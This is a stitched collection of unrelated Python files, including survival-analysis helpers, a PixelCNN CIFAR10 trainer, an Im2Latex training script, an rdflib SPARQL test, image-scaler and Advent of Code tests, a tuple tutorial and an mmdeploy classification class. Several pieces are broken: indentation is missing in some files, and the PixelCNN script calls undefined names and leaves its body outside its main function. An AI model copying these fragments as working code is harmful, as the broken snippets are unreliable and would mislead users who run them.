        marital_status[str(patient.marital_status)] = 1
plt.bar(range(len(marital_status)), list(marital_status.values()), align='center')
plt.xticks(range(len(marital_status)), list(marital_status.keys()))
plt.show()
import pytest
import respx
@pytest.fixture()
async def httpx_mock():
    """Yield a respx router that mocks HTTPX calls against http://example.com.

    NOTE(review): an async fixture requires an async-capable pytest plugin
    (e.g. pytest-asyncio) — confirm one is configured for this test suite.
    """
    async with respx.mock(base_url='http://example.com') as _http_mock:
        yield _http_mock
|
'''
PROG II - Segunda Avaliação -
Integrantes:
ADALINE NOGUEIRA FERNANDES FIRMO
THIAGO VINICIOS LIMA DE ARAUJO SOUSA
MATHEUS DA COSTA DA SILVA
Questão 02
'''
from typing import List
class Ticket:
    """A raffle ticket identified by its integer number."""
    def __init__(self, val: str):
        self.number = int(val)  # raises ValueError for non-numeric input
class OccurrencesCounter:
def __init__(self, tickets: List[Ticket]):
self.tickets = tickets
def count_occurrences(self):
occurrences = {}
for t in self.tickets:
try:
occurrences[str(t.number)] += 1
except KeyError:
occurrences[str(t.number)] = 1
return occurrences
def main():
    """Read ticket batches from stdin until a "0 0" line; for each batch,
    print how many ticket numbers occur more than once (i.e. forgeries)."""
    while True:
        true_tickets, people_present = list(map(int, input().split()))
        if true_tickets == people_present == 0:
            break
        all_tickets = list(map(lambda v: Ticket(v), input().split()))
        counter = OccurrencesCounter(all_tickets)
        occurrences = counter.count_occurrences()
        false_tickets = 0
        # Each number seen more than once counts as one false ticket.
        for v in occurrences.values():
            if v > 1:
                false_tickets += 1
        print(false_tickets)
if __name__ == '__main__':
main()
|
import uuid
from mixer.backend.django import mixer
# BUGFIX: __all__ must contain *names* (strings); listing the object itself
# makes `from <module> import *` raise TypeError.
__all__ = [
    'mixer',
]
def _random_user_name() -> str:
return str(uuid.uuid4())
def _random_email() -> str:
uuid_as_str = str(uuid.uuid4()).replace('-', '_')
return f'{uuid_as_str}@mail.com'
mixer.register('users.User', username=_random_user_name, email=_random_email)
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import sys
# Package metadata for the TabPy server distribution.
setup(
    name='tabpy-server',
    version='0.2',
    description='Web server Tableau uses to run Python scripts.',
    url='https://github.com/tableau/TabPy',
    author='Tableau',
    author_email='github@tableau.com',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.5',
        "Topic :: Scientific/Engineering",
        "Topic :: Scientific/Engineering :: Information Analysis",
    ],
    packages=['tabpy_server',
              'tabpy_server.common',
              'tabpy_server.management',
              'tabpy_server.psws',
              'tabpy_server.static'],
    # Ship static assets plus the startup scripts and state template.
    package_data={'tabpy_server.static':['*.*'],
                  'tabpy_server':['startup.*','state.ini.template']},
    license='MIT',
    install_requires=[
        'future',
        # NOTE(review): 'futures' is the Python 2 backport of
        # concurrent.futures and is unnecessary (and can break installs)
        # on Python 3 — confirm whether it can be dropped.
        'futures',
        'requests',
        'simplejson',
        'Tornado-JSON',
        'tornado',
        'cloudpickle',
        'decorator',
        'python-dateutil',
        'genson',
        'jsonschema',
        'tabpy_client',
        'numpy'
    ]
)
|
import warnings
import numpy as np
import torch
import torch.nn.functional as F
import torchtuples as tt
def pad_col(input, val=0, where='end'):
    """Append (or prepend) a constant column of `val` to a 2-D tensor."""
    if len(input.shape) != 2:
        raise ValueError("Only works for `phi` tensor that is 2-D.")
    column = torch.zeros_like(input[:, :1])
    if val != 0:
        column = column + val
    if where == 'start':
        return torch.cat([column, input], dim=1)
    if where == 'end':
        return torch.cat([input, column], dim=1)
    raise ValueError(f"Need `where` to be 'start' or 'end', got {where}")
def array_or_tensor(tensor, numpy, input):
    """Deprecated shim: forwards to `torchtuples.utils.array_or_tensor`
    and emits a DeprecationWarning. Kept for backward compatibility."""
    warnings.warn('Use `torchtuples.utils.array_or_tensor` instead', DeprecationWarning)
    return tt.utils.array_or_tensor(tensor, numpy, input)
def make_subgrid(grid, sub=1):
    """When calling `predict_surv` with sub != 1 this can help with
    creating the duration index of the survival estimates.
    E.g.
    sub = 5
    surv = model.predict_surv(test_input, sub=sub)
    grid = model.make_subgrid(cuts, sub)
    surv = pd.DataFrame(surv, index=grid)
    """
    # Split every [start, end) interval of `grid` into `sub` equal pieces,
    # dropping each interval's right endpoint to avoid duplicates...
    subgrid = tt.TupleTree(np.linspace(start, end, num=sub+1)[:-1]
                           for start, end in zip(grid[:-1], grid[1:]))
    # ...then flatten and re-append the final grid point once.
    subgrid = subgrid.apply(lambda x: tt.TupleTree(x)).flatten() + (grid[-1],)
    return subgrid
def log_softplus(input, threshold=-15.):
    """Numerically-stable log(softplus(input)).

    For entries below `threshold` the identity log(softplus(x)) ~= x is used,
    so those values are returned unchanged.

    Arguments:
        input {torch.tensor} -- Input tensor

    Keyword Arguments:
        threshold {float} -- Treshold for when to just return input (default: {-15.})

    Returns:
        torch.tensor -- return log(softplus(input)).
    """
    result = input.clone()
    mask = input >= threshold
    result[mask] = F.softplus(input[mask]).log()
    return result
def cumsum_reverse(input: torch.Tensor, dim: int = 1) -> torch.Tensor:
    """Cumulative sum from the right along `dim` (only dim=1 is supported)."""
    if dim != 1:
        raise NotImplementedError
    total = input.sum(1, keepdim=True)
    running = pad_col(input, where='start').cumsum(1)
    return (total - running)[:, :-1]
|
"""Script to train pixelCNN on the CIFAR10 dataset."""
import random as rn
import time
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from tensorflow import keras
class MaskedConv2D(keras.layers.Layer):
    """Convolutional layers with masks.

    Convolutional layers with simple implementation of masks type A and B for
    autoregressive models.

    Arguments:
    mask_type: one of `"A"` or `"B".`
    filters: Integer, the dimensionality of the output space
        (i.e. the number of output filters in the convolution).
    kernel_size: An integer or tuple/list of 2 integers, specifying the
        height and width of the 2D convolution window.
        Can be a single integer to specify the same value for
        all spatial dimensions.
    strides: An integer or tuple/list of 2 integers,
        specifying the strides of the convolution along the height and width.
        Can be a single integer to specify the same value for
        all spatial dimensions.
        Specifying any stride value != 1 is incompatible with specifying
        any `dilation_rate` value != 1.
    padding: one of `"valid"` or `"same"` (case-insensitive).
    kernel_initializer: Initializer for the `kernel` weights matrix.
    bias_initializer: Initializer for the bias vector.
    """

    def __init__(self,
                 mask_type,
                 filters,
                 kernel_size,
                 strides=1,
                 padding='same',
                 kernel_initializer='glorot_uniform',
                 bias_initializer='zeros',
                 input_n_channels=3):
        super(MaskedConv2D, self).__init__()

        assert mask_type in {'A', 'B'}
        self.mask_type = mask_type

        self.filters = filters
        self.kernel_size = kernel_size
        self.strides = strides
        self.padding = padding.upper()
        self.kernel_initializer = keras.initializers.get(kernel_initializer)
        self.bias_initializer = keras.initializers.get(bias_initializer)
        self.input_n_channels = input_n_channels

    def build(self, input_shape):
        self.kernel = self.add_weight("kernel",
                                      shape=(self.kernel_size,
                                             self.kernel_size,
                                             int(input_shape[-1]),
                                             self.filters),
                                      initializer=self.kernel_initializer,
                                      trainable=True)

        self.bias = self.add_weight("bias",
                                    shape=(self.filters,),
                                    initializer=self.bias_initializer,
                                    trainable=True)

        # Build the autoregressive mask over the kernel: zero out weights for
        # pixels to the right of the centre in the same row, and all rows below.
        center = self.kernel_size // 2
        mask = np.ones(self.kernel.shape, dtype=np.float32)
        mask[center, center + 1:, :, :] = 0
        mask[center + 1:, :, :, :] = 0

        # Channel ordering at the centre pixel: type A also hides the current
        # channel (i >= j), type B allows it (i > j); channels are interleaved
        # with stride `input_n_channels` along the in/out channel axes.
        for i in range(self.input_n_channels):
            for j in range(self.input_n_channels):
                if (self.mask_type == 'A' and i >= j) or (self.mask_type == 'B' and i > j):
                    mask[center, center, i::self.input_n_channels, j::self.input_n_channels] = 0

        self.mask = tf.constant(mask, dtype=tf.float32, name='mask')

    def call(self, input):
        # Apply the fixed mask to the kernel on every forward pass so masked
        # weights contribute nothing regardless of training updates.
        masked_kernel = tf.math.multiply(self.mask, self.kernel)
        x = tf.nn.conv2d(input,
                         masked_kernel,
                         strides=[1, self.strides, self.strides, 1],
                         padding=self.padding)
        x = tf.nn.bias_add(x, self.bias)
        return x
class ResidualBlock(keras.Model):
    """Residual blocks that compose pixelCNN

    Blocks of layers with 3 convolutional layers and one residual connection.
    Based on Figure 5 from [1] where h indicates number of filters.

    Refs:
    [1] - Oord, A. V. D., Kalchbrenner, N., & Kavukcuoglu, K. (2016). Pixel recurrent
    neural networks. arXiv preprint arXiv:1601.06759.
    """

    def __init__(self, h):
        super(ResidualBlock, self).__init__(name='')
        # 1x1 bottleneck down to h/2 filters, 7x7 masked conv, 1x1 back to h.
        self.conv2a = MaskedConv2D(mask_type='B', filters=h//2, kernel_size=1, strides=1)
        self.conv2b = MaskedConv2D(mask_type='B', filters=h//2, kernel_size=7, strides=1)
        self.conv2c = MaskedConv2D(mask_type='B', filters=h, kernel_size=1, strides=1)

    def call(self, input_tensor):
        # Pre-activation residual: ReLU before each conv, skip added at the end.
        x = tf.nn.relu(input_tensor)
        x = self.conv2a(x)
        x = tf.nn.relu(x)
        x = self.conv2b(x)
        x = tf.nn.relu(x)
        x = self.conv2c(x)
        x += input_tensor
        return x
def quantise(images, q_levels):
    """Quantise image into q levels."""
    bin_edges = np.arange(q_levels) / q_levels
    level_indices = np.digitize(images, bin_edges) - 1
    return level_indices.astype('float32')
def main():
# ------------------------------------------------------------------------------------
# Defining random seeds
random_seed = 42
tf.random.set_seed(random_seed)
np.random.seed(random_seed)
rn.seed(random_seed)
# ------------------------------------------------------------------------------------
# Loading data
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
height = 32
width = 32
n_channel = 3
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = x_train.reshape(x_train.shape[0], height, width, n_channel)
x_test = x_test.reshape(x_test.shape[0], height, width, n_channel)
# --------------------------------------------------------------------------------------------------------------
# Quantisize the input data in q levels
q_levels = 8
x_train_quantised_of = quantisize(x_train_overfit, q_levels)
x_test_quantised_of = quantisize(x_test_overfit, q_levels)
# ------------------------------------------------------------------------------------
# Creating input stream using tf.data API
batch_size = 128
train_buf = 60000
train_dataset = tf.data.Dataset.from_tensor_slices(
(x_train_quantised / (q_levels - 1),
x_train_quantised.astype('int32')))
train_dataset = train_dataset.shuffle(buffer_size=train_buf)
train_dataset = train_dataset.batch(batch_size)
test_dataset = tf.data.Dataset.from_tensor_slices((x_test_quantised / (q_levels - 1),
x_test_quantised.astype('int32')))
test_dataset = test_dataset.batch(batch_size)
# --------------------------------------------------------------------------------------------------------------
# Create PixelCNN model
n_filters = 120
inputs = keras.layers.Input(shape=(height, width, n_channel))
x = MaskedConv2D(mask_type='A', filters=n_filters, kernel_size=7)(inputs)
for i in range(15):
x = keras.layers.Activation(activation='relu')(x)
x = ResidualBlock(h=n_filters)(x)
x = keras.layers.Activation(activation='relu')(x)
x = MaskedConv2D(mask_type='B', filters=n_filters, kernel_size=1)(x)
x = keras.layers.Activation(activation='relu')(x)
x = MaskedConv2D(mask_type='B', filters=n_channel * q_levels, kernel_size=1)(x) # shape [N,H,W,DC]
pixelcnn = tf.keras.Model(inputs=inputs, outputs=x)
# --------------------------------------------------------------------------------------------------------------
# Prepare optimizer and loss function
lr_decay = 0.9999
learning_rate = 5e-3 #5
optimizer = tf.keras.optimizers.Adam(lr=learning_rate)
compute_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)
# --------------------------------------------------------------------------------------------------------------
@tf.function
def train_step(batch_x, batch_y):
    """Run one optimization step of the PixelCNN and return the batch loss."""
    with tf.GradientTape() as tape:
        raw_logits = pixelcnn(batch_x, training=True)
        # [N, H, W, C*Q] -> [N, H, W, Q, C] -> [N, H, W, C, Q]
        per_level = tf.reshape(raw_logits, [-1, height, width, q_levels, n_channel])
        per_channel = tf.transpose(per_level, perm=[0, 1, 2, 4, 3])
        loss = compute_loss(tf.one_hot(batch_y, q_levels), per_channel)
    grads = tape.gradient(loss, pixelcnn.trainable_variables)
    grads, _ = tf.clip_by_global_norm(grads, 1.0)
    optimizer.apply_gradients(zip(grads, pixelcnn.trainable_variables))
    return loss
# ------------------------------------------------------------------------------------
# Training loop
n_epochs = 20
n_iter = int(np.ceil(x_train_quantised.shape[0] / batch_size))
for epoch in range(n_epochs):
    progbar = Progbar(n_iter)
    print('Epoch {:}/{:}'.format(epoch + 1, n_epochs))
    for i_iter, (batch_x, batch_y) in enumerate(train_dataset):
        # Exponential learning-rate decay, applied once per step.
        # NOTE(review): mutating optimizer.lr by plain assignment works on the
        # TF versions this targets; optimizer.lr.assign(...) is the documented
        # route — confirm against the pinned TF version.
        optimizer.lr = optimizer.lr * lr_decay
        loss = train_step(batch_x, batch_y)
        progbar.add(1, values=[('loss', loss)])
# ------------------------------------------------------------------------------------
# Test set performance
test_loss = []
for batch_x, batch_y in test_dataset:
    logits = pixelcnn(batch_x, training=False)
    # Calculate cross-entropy (= negative log-likelihood)
    # NOTE(review): unlike train_step, logits are not reshaped/transposed here,
    # which only lines up with the one-hot targets when n_channel == 1 — confirm.
    loss = compute_loss(tf.squeeze(tf.one_hot(batch_y, q_levels)), logits)
    test_loss.append(loss)
print('nll : {:} nats'.format(np.array(test_loss).mean()))
print('bits/dim : {:}'.format(np.array(test_loss).mean() / np.log(2)))
# ------------------------------------------------------------------------------------
# Generating new images: sample pixel by pixel in raster order, feeding the
# partially generated canvas back through the network each step.
samples = np.zeros((100, height, width, n_channel), dtype='float32')
for i in range(height):
    for j in range(width):
        logits = pixelcnn(samples)
        next_sample = tf.random.categorical(logits[:, i, j, :], 1)
        samples[:, i, j, 0] = (next_sample.numpy() / (q_levels - 1))[:, 0]
fig = plt.figure(figsize=(10, 10))
for i in range(100):
    ax = fig.add_subplot(10, 10, i + 1)
    ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
    plt.xticks(np.array([]))
    plt.yticks(np.array([]))
plt.show()
# ------------------------------------------------------------------------------------
# Filling occluded images: zero the bottom rows of a few test images and
# regenerate them pixel by pixel (and channel by channel) from the model.
occlude_start_row = 16
num_generated_images = 10
samples = np.copy(x_test_quantised[0:num_generated_images, :, :, :])
samples = samples / (q_levels - 1)
samples[:, occlude_start_row:, :, :] = 0
fig = plt.figure(figsize=(10, 10))
for i in range(10):
    ax = fig.add_subplot(1, 10, i + 1)
    ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
    plt.xticks(np.array([]))
    plt.yticks(np.array([]))
for i in range(occlude_start_row, height):
    for j in range(width):
        for k in range(n_channel):
            logits = pixelcnn(samples)
            logits = tf.reshape(logits, [-1, height, width, q_levels, n_channel])
            logits = tf.transpose(logits, perm=[0, 1, 2, 4, 3])
            next_sample = tf.random.categorical(logits[:, i, j, k, :], 1)
            samples[:, i, j, k] = (next_sample.numpy() / (q_levels - 1))[:, 0]
fig = plt.figure(figsize=(10, 10))
for i in range(10):
    ax = fig.add_subplot(1, 10, i + 1)
    ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
    plt.xticks(np.array([]))
    plt.yticks(np.array([]))
plt.show()
# NOTE(review): `main` is not defined in this file as shown — presumably
# defined earlier, or this guard is vestigial from a template. Confirm.
if __name__ == '__main__':
    main()
|
import sys

# Make the project root importable BEFORE importing from `app`.  In the
# original, the path was inserted AFTER `from app import ...`, so it could
# never influence that import and a run from outside the project directory
# failed with ModuleNotFoundError.
sys.path.insert(0, "/root/flask-hellogit")

from app import create_app, create_manager

# Select the configuration mode
app = create_app('development')
manager = create_manager(app)

if __name__ == "__main__":
    manager.run()
|
import argparse
from functools import partial
from os.path import join
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch_optimizer import RAdam
from utils import collate_fn, build_vocab
from data import Im2LatexDataset
from model import Im2LatexModel # check this
from training import Trainer
from make_vocab import make_vocab
import wandb
import os
# Fix the PyTorch RNG so training runs are reproducible.
torch.manual_seed(42)
def main():
    """Parse CLI arguments, build the Im2Latex data loaders and model, then
    train and evaluate it while logging to Weights & Biases.

    Side effects: creates the checkpoint directory, (re)builds the vocab file
    under --data_path, and starts a wandb run.
    """
    # get args
    parser = argparse.ArgumentParser(description="Im2Latex Training Program")
    parser.add_argument('--path', required=True, help='root of the model')
    # model args
    parser.add_argument(
        "--emb_dim", type=int, default=80, help="Embedding size")
    parser.add_argument(
        "--enc_rnn_h",
        type=int,
        default=256,
        help="The hidden state of the encoder RNN")
    parser.add_argument(
        "--dec_rnn_h",
        type=int,
        default=512,
        help="The hidden state of the decoder RNN")
    parser.add_argument(
        "--data_path",
        type=str,
        default="./sample_data/",
        help="The dataset's dir")
    # training args
    parser.add_argument(
        "--cuda", action='store_true', default=True, help="Use cuda or not")
    parser.add_argument("--batch_size", type=int, default=4)
    parser.add_argument("--test_batch_size", type=int, default=1)
    parser.add_argument("--test_beam_size", type=int, default=5)
    parser.add_argument("--epochs", type=int, default=12)
    parser.add_argument("--opt", type=str, default='RAdam')
    parser.add_argument(
        "--lr", type=float, default=0.001, help="Learning Rate")
    parser.add_argument(
        "--lr_decay", type=float, default=0.5, help="Learning Rate Decay Rate")
    parser.add_argument(
        "--lr_patience",
        type=int,
        default=1,
        help="Learning Rate Decay Patience")
    parser.add_argument(
        "--clip", type=float, default=5.0, help="The max gradient norm")
    parser.add_argument(
        "--log_dir",
        type=str,
        default='./checkpoints/',  # was an f-string with no placeholders
        help="The dir to save checkpoints")
    parser.add_argument(
        "--load_from_checkpoint",
        type=str,
        default=None,
        help="path to checkpoint, you want to start from"
    )
    parser.add_argument(
        "--vocab_path",
        type=str,
        default="./sample_data/vocab.pkl",
        help="The path to vocab file")
    parser.add_argument(
        "--print_freq",
        type=int,
        default=4,
        help="The frequency to print message")
    # new args
    parser.add_argument(
        "--cnn",
        type=str,
        default='harvard',
        help="cnn model specification")
    parser.add_argument(
        "--attn",
        type=int,
        default=1,
        help="attention type")
    parser.add_argument(
        "--pos_enc",
        type=str,
        default='none',
        help="positional encoding after cnn encoder")
    parser.add_argument(
        "--dec_init",
        type=int,
        default=0,
        help="decoder hidden states initialization")
    parser.add_argument(
        "--max_len",
        type=int,
        default=50,
        help="max predicted sequence length"
    )
    wandb.login()
    args = parser.parse_args()
    # makedirs(..., exist_ok=True) is race-free, unlike exists() + mkdir().
    os.makedirs(args.log_dir, exist_ok=True)
    # Building vocab
    make_vocab(args.data_path)
    vocab = build_vocab(join(args.data_path, 'vocab.pkl'))
    # `args.cuda and ...` is already a bool; no ternary needed.
    use_cuda = args.cuda and torch.cuda.is_available()
    device = torch.device("cuda" if use_cuda else "cpu")
    # argparse.Namespace supports plain attribute assignment.
    args.device = device
    # data loader
    train_loader = DataLoader(
        Im2LatexDataset(args.data_path, 'train'),
        batch_size=args.batch_size,
        collate_fn=partial(collate_fn, vocab.sign2id),
        #pin_memory=True if use_cuda else False,
        num_workers=4)
    val_loader = DataLoader(
        Im2LatexDataset(args.data_path, 'validate'),
        batch_size=args.batch_size,
        collate_fn=partial(collate_fn, vocab.sign2id),
        #pin_memory=True if use_cuda else False,
        num_workers=4)
    test_loader = DataLoader(
        Im2LatexDataset(args.data_path, 'test'),
        batch_size=args.test_batch_size,
        collate_fn=partial(collate_fn, vocab.sign2id),
        # pin_memory=True if use_cuda else False,
        num_workers=4)
    # construct model
    vocab_size = len(vocab)
    model = Im2LatexModel(vocab_size, args.emb_dim, args.enc_rnn_h,
                          args.dec_rnn_h, args.cnn, args.attn,
                          args.pos_enc, args.dec_init)
    # construct optimizer
    if args.opt == 'RAdam':
        optimizer = RAdam(model.parameters(), lr=args.lr)
    elif args.opt == 'Adam':
        optimizer = optim.Adam(model.parameters(), lr=args.lr)
    else:
        raise ValueError(f"Unknown optimizer: {args.opt}")
    # Halve (by lr_decay) the LR when the validation metric plateaus.
    lr_scheduler = ReduceLROnPlateau(
        optimizer,
        "min",
        factor=args.lr_decay,
        patience=args.lr_patience,
        verbose=True)
    with wandb.init(project='im2latex', config=args):
        epoch = 0
        global_step = 0
        if args.load_from_checkpoint:
            # Resume model/optimizer/scheduler state and training position.
            checkpoint = torch.load(args.load_from_checkpoint)
            model.load_state_dict(checkpoint['model_state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
            lr_scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
            epoch = checkpoint['epoch']
            global_step = checkpoint['global_step']
        model = model.to(device)
        # init trainer
        trainer = Trainer(optimizer, model, lr_scheduler, train_loader, val_loader, test_loader, args, epoch, global_step)
        # begin training
        trainer.train()
        trainer.test(beam_size=args.test_beam_size)
# Script entry point.
if __name__ == "__main__":
    main()
|
import unittest
from rdflib import RDF
from rdflib.graph import ConjunctiveGraph
# Turtle/N3 fixture: two nodes carrying rdf:value 1 and -2.
testgraph = """\
@prefix : <http://example.org/> .
@prefix rdf: <%s> .
:foo rdf:value 1 .
:bar rdf:value -2 .""" % RDF.uri
# SPARQL query exercising a '<' FILTER against a negative integer literal
# (the regression under test); only :bar (value -2) should match.
testquery = """\
SELECT ?node
WHERE {
?node rdf:value ?val .
FILTER (?val < -1)
}"""
class TestIssue11(unittest.TestCase):
    """Regression test: SPARQL '<' FILTER must work with negative integers."""

    debug = False
    sparql = True

    def setUp(self):
        NS = "http://example.org/"
        self.graph = ConjunctiveGraph()
        self.graph.parse(data=testgraph, format="n3", publicID=NS)

    def testSPARQL_lessthan_filter_using_negative_integer(self):
        # Honour the class-level `debug` flag instead of hard-coding DEBUG=True.
        rt = self.graph.query(testquery, initNs={'rdf': RDF}, DEBUG=self.debug)
        rows = list(rt)
        # Guard against a vacuous pass: the original loop asserted nothing
        # when the FILTER (incorrectly) returned no rows.
        self.assertTrue(rows, "query returned no rows")
        for row in rows:
            self.assertEqual(str(row[0]), "http://example.org/bar")
if __name__ == '__main__':
    # The original called the test method on the class itself, which raises
    # TypeError (no `self`). Let unittest discover and run the test case.
    unittest.main()
|
from fractions import Fraction
from variations.scaler import Scaler
class TestScaler:
    """Unit tests for variations.scaler.Scaler (aspect-ratio-preserving resizing)."""

    def test_scaler_str(self):
        # str() renders as "WIDTHxHEIGHT".
        s = Scaler(300, 600)
        assert str(s) == "300x600"

    def test_scaler_repr(self):
        s = Scaler(300, 600)
        assert repr(s) == "Scaler(300, 600)"

    def test_scaler_ratio(self):
        # ratio is width/height (exact Fraction when not representable as float)
        # and is preserved across set_width/set_height.
        assert Scaler(300, 600).ratio == 0.5
        assert Scaler(300, 100).ratio == 3
        assert Scaler(100, 300).ratio == Fraction(1, 3)
        s = Scaler(300, 600, upscale=False)
        s.set_width(200)
        assert s.width == 200
        assert s.height == 400
        assert s.ratio == 0.5

    def test_scaler_noupscale(self):
        # With upscale=False, requests larger than the original size are
        # clamped back to the original dimensions.
        s = Scaler(300, 600, upscale=False)
        s.set_width(200)
        assert s.width == 200
        assert s.height == 400
        s.set_width(400)
        assert s.width == 300
        assert s.height == 600
        s.set_height(300)
        assert s.width == 150
        assert s.height == 300
        s.set_height(800)
        assert s.width == 300
        assert s.height == 600
        s = Scaler(300, 600, upscale=False)
        s.set_height(500)
        assert s.width == 250
        assert s.height == 500
        s = Scaler(300, 600, upscale=False)
        s.set_height(800)
        assert s.width == 300
        assert s.height == 600

    def test_scaler_upscale(self):
        # With upscale=True, enlarging requests are honoured while keeping
        # the aspect ratio.
        s = Scaler(300, 600, upscale=True)
        s.set_width(200)
        assert s.width == 200
        assert s.height == 400
        s.set_width(400)
        assert s.width == 400
        assert s.height == 800
        s.set_height(300)
        assert s.width == 150
        assert s.height == 300
        s.set_height(800)
        assert s.width == 400
        assert s.height == 800
        s = Scaler(300, 600, upscale=True)
        s.set_height(500)
        assert s.width == 250
        assert s.height == 500
        s = Scaler(300, 600, upscale=True)
        s.set_height(800)
        assert s.width == 400
        assert s.height == 800
|
from unittest import TestCase
from src.util.load_data import load_data
from src.year2020.day02 import part_1, part_2, PasswordEntry, prepare_data
from test.decorators import sample
# Puzzle input and samples for 2020 day 2, loaded once at module import.
data = load_data(2020, 2)
@sample
class Test2020Day02Samples(TestCase):
    """Checks parts 1 and 2 against the worked sample from the puzzle text."""

    prepared_data: list[PasswordEntry]

    @classmethod
    def setUpClass(cls) -> None:
        # Parse the first sample block once for all tests in the class.
        cls.prepared_data = prepare_data(data.samples[0])

    def test_part_1(self) -> None:
        self.assertEqual(2, part_1(self.prepared_data))

    def test_part_2(self) -> None:
        self.assertEqual(1, part_2(self.prepared_data))
class Test2020Day02(TestCase):
    """Checks parts 1 and 2 against the real puzzle input (known answers)."""

    prepared_data: list[PasswordEntry]

    @classmethod
    def setUpClass(cls) -> None:
        # Parse the full puzzle input once for all tests in the class.
        cls.prepared_data = prepare_data(data.input)

    def test_part_1(self) -> None:
        self.assertEqual(434, part_1(self.prepared_data))

    def test_part_2(self) -> None:
        self.assertEqual(509, part_2(self.prepared_data))
|
# Tuples are compound variables; tuples are immutable.
lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
print(lanche)
print(lanche[0])
print(lanche[1:3])
print(lanche[2:])
print(lanche[:2])
print(lanche[-3:])
print(sorted(lanche))
for c in lanche:
    print(f'Vou comer um {c}')
print('OUTRA MANEIRA:')
# Index-based iteration (shown for teaching; enumerate below is preferred).
for cont in range(0, len(lanche)):
    print(f'Vou comer um {lanche[cont]} no {cont}')
print(f'Comi {len(lanche)} lanches!')
print('OUTRA MANEIRA ENUMERADA!')
for pos, comida in enumerate(lanche):
    print(f'Vou comer um {comida} no {pos}')  # fixed typo: "comeer" -> "comer"
print('- ' * 40)
print('')
# Concatenating tuples creates a new tuple.
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
print(c)
print(len(c))
print(c.count(5))  # count how many 5s exist
print(c.index(2, 1))  # position of value 2, searching from index 1
print(sorted(c))
del a  # `del` is a statement, not a function: unbinds the name
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import List, Optional, Union
import mmcv
import torch
from mmcv.utils import Registry
from torch.utils.data import DataLoader, Dataset
from mmdeploy.codebase.base import CODEBASE, BaseTask, MMCodebase
from mmdeploy.utils import Codebase, get_task_type
def __build_mmcls_task(model_cfg: mmcv.Config, deploy_cfg: mmcv.Config,
                       device: str, registry: Registry) -> BaseTask:
    """Registry build_func: look up the task class named by the deploy
    config's task type and instantiate it with the given configs/device."""
    task = get_task_type(deploy_cfg)
    return registry.module_dict[task.value](model_cfg, deploy_cfg, device)


# Registry of mmcls task processors, built through __build_mmcls_task.
MMCLS_TASK = Registry('mmcls_tasks', build_func=__build_mmcls_task)
@CODEBASE.register_module(Codebase.MMCLS.value)
class MMClassification(MMCodebase):
    """mmclassification codebase class."""

    task_registry = MMCLS_TASK

    def __init__(self):
        super(MMClassification, self).__init__()

    @staticmethod
    def build_task_processor(model_cfg: mmcv.Config, deploy_cfg: mmcv.Config,
                             device: str) -> BaseTask:
        """The interface to build the task processors of mmclassification.

        (Docstring previously said "mmseg" — copy/paste leftover.)

        Args:
            model_cfg (mmcv.Config): Model config file.
            deploy_cfg (mmcv.Config): Deployment config file.
            device (str): A string specifying device type.

        Returns:
            BaseTask: A task processor.
        """
        return MMCLS_TASK.build(model_cfg, deploy_cfg, device)

    @staticmethod
    def build_dataset(dataset_cfg: Union[str, mmcv.Config],
                      dataset_type: str = 'val',
                      **kwargs) -> Dataset:
        """Build dataset for classification.

        Args:
            dataset_cfg (str | mmcv.Config): The input dataset config.
            dataset_type (str): A string represents dataset type, e.g.: 'train'
                , 'test', 'val'. Default: 'val'.

        Returns:
            Dataset: A PyTorch dataset.
        """
        from mmcls.datasets import build_dataset as build_dataset_mmcls

        from mmdeploy.utils import load_config
        dataset_cfg = load_config(dataset_cfg)[0]
        data = dataset_cfg.data
        assert dataset_type in data

        dataset = build_dataset_mmcls(data[dataset_type])
        return dataset

    # FIX: this was declared as an instance method although its first
    # parameter is `dataset`, not `self` — calling it on an instance would
    # shift every argument by one. All sibling builders are static.
    @staticmethod
    def build_dataloader(dataset: Dataset,
                         samples_per_gpu: int,
                         workers_per_gpu: int,
                         num_gpus: int = 1,
                         dist: bool = False,
                         shuffle: bool = False,
                         round_up: bool = True,
                         seed: Optional[int] = None,
                         pin_memory: bool = True,
                         persistent_workers: bool = True,
                         **kwargs) -> DataLoader:
        """Build dataloader for classifier.

        Args:
            dataset (Dataset): Input dataset.
            samples_per_gpu (int): Number of training samples on each GPU,
                i.e., batch size of each GPU.
            workers_per_gpu (int): How many subprocesses to use for data
                loading for each GPU.
            num_gpus (int): Number of GPUs. Only used in non-distributed
                training.
            dist (bool): Distributed training/test or not. Default: False.
            shuffle (bool): Whether to shuffle the data at every epoch.
                Default: False.
            round_up (bool): Whether to round up the length of dataset by
                adding extra samples to make it evenly divisible.
                Default: True.
            seed (int): An integer set to be seed. Default: None.
            pin_memory (bool): Whether to use pin_memory in DataLoader.
                Default: True.
            persistent_workers (bool): If `True`, the data loader will not
                shutdown the worker processes after a dataset has been
                consumed once. This allows to maintain the workers Dataset
                instances alive. The argument also has effect in
                PyTorch>=1.7.0. Default: True.
            kwargs: Any other keyword argument to be used to initialize
                DataLoader.

        Returns:
            DataLoader: A PyTorch dataloader.
        """
        from mmcls.datasets import build_dataloader as build_dataloader_mmcls
        return build_dataloader_mmcls(dataset, samples_per_gpu,
                                      workers_per_gpu, num_gpus, dist, shuffle,
                                      round_up, seed, pin_memory,
                                      persistent_workers, **kwargs)

    @staticmethod
    def single_gpu_test(model: torch.nn.Module,
                        data_loader: DataLoader,
                        show: bool = False,
                        out_dir: Optional[str] = None,
                        win_name: str = '',
                        **kwargs) -> List:
        """Run test with single gpu.

        Args:
            model (torch.nn.Module): Input model from nn.Module.
            data_loader (DataLoader): PyTorch data loader.
